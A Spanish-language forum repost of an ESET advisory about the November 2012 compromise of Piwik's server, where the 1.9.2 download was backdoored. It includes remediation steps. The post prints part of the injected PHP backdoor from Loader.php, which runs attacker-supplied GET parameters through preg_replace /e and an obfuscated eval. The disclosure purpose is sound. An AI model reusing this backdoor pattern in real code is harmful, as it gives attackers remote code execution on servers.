Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Servidor de Piwik vulnerado y utilizado para propagar código malicioso

  • 0 Respuestas
  • 2140 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado LucaSthefano

  • *
  • Underc0der
  • Mensajes: 399
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« en: Noviembre 30, 2012, 09:48:06 pm »
El servidor web de Piwik.org fue vulnerado el día 26 de Noviembre por un atacante. El ciberdelincuente modificó el archivo zip disponible para la descarga por parte de los usuarios correspondiente a la versión 1.9.2, agregando código malicioso en el interior de dicho archivo.

Piwik es una herramienta open source que permite recolectar estadísticas sobre un servidor web. Además posee funcionalidades tales como la generación de reportes detallados sobre los visitantes que recibe un sitio web, realización de campañas de marketing, entre otras.

Aparentemente, y según el propio blog de Piwik, el atacante habría comprometido el servidor por una vulnerabilidad en un plugin de WordPress.

Luego del compromiso, el archivo descargable se mantuvo con la modificación del código malicioso durante algunas horas, por lo que los usuarios que hayan descargado el software durante ese período obtuvieron una versión maliciosa del mismo. Específicamente, el archivo modificado fue Loader.php ubicado dentro de la carpeta piwik/core/. A continuación se adjunta parte del código malicioso:

Código: PHP
  1. <?php Error_Reporting(0);       if(isset($_GET['g']) && isset($_GET['s'])) {
  2. preg_replace(/(.+)/e”, $_GET['g'], ‘dwm’);     exit;
  3. }
  4. if (file_exists(dirname(__FILE__)./lic.log)) exit;
  5. eval(gzuncompress(base64_decode(‘eF6Fkl9LwzAUxb+KD0I3EOmabhCkD/OhLWNOVrF/IlKat

Según información del propio foro de discusión de Piwik, el código malicioso insertado corresponde a un backdoor que permitiría al atacante ejecutar cualquier función válida que pueda ejecutarse mediante eval().

En el caso de que se haya instalado la versión modificada es recomendable seguir los siguientes pasos para solucionar el problema:

  • Realizar una copia de piwik/config/config.ini.php.
  • Borrar el directorio completo de piwik/.
  • Descargar la última versión de Piwik (el código malicioso ya fue removido).
  • Descomprimir el archivo descargado y situarlo en el servidor.
  • Copiar el archivo de configuración config.ini.php previamente respaldado en el directorio /piwik/config/.
  • En esta instancia, Piwik debería ejecutarse correctamente con la configuración anterior.

Cabe destacar que ningún tipo de información correspondiente a los usuarios de este software ha sido extraída del servidor vulnerado debido a que el mismo no guarda información correspondiente a sus usuarios.

El compromiso de servidores web por parte de los ciberdelincuentes tiene distintas motivaciones. En este caso fue la modificación de parte del software disponible para infectar a aquellos usuarios que descargan el mismo.

Se recomienda a todos los usuarios que naveguen en la web estar en alerta, tener cuidado y revisar siempre sus descargas. Todo sistema puede ser vulnerado, incluso cuando menos lo pensamos.

Saludos!

Fuente: Laboratorios ESET

 

¿Te gustó el post? COMPARTILO!



ANTI-Cuckoo: herramienta para detectar y crashear el Sandbox de Cuckoo.

Iniciado por Gabriela

Respuestas: 0
Vistas: 2202
Último mensaje Julio 11, 2015, 02:48:12 pm
por Gabriela
linux-smart-enumeration: herramientas de enumeración de Linux para pentesting.

Iniciado por Gold Master

Respuestas: 0
Vistas: 1870
Último mensaje Abril 16, 2019, 09:02:07 pm
por Gold Master
SysKey para proteger la base de datos del Administrador de cuentas de seguridad

Iniciado por Aryenal.Bt

Respuestas: 1
Vistas: 3685
Último mensaje Agosto 17, 2012, 03:47:03 pm
por baron.power
Theola, malware utiliza plugin de Chrome para fraude bancario

Iniciado por LucaSthefano

Respuestas: 0
Vistas: 2307
Último mensaje Marzo 23, 2013, 05:52:03 pm
por LucaSthefano
Linux/Snakso.A: rootkit diseñado para inyectar Iframe en servidores web

Iniciado por LucaSthefano

Respuestas: 0
Vistas: 2138
Último mensaje Noviembre 21, 2012, 08:51:37 pm
por LucaSthefano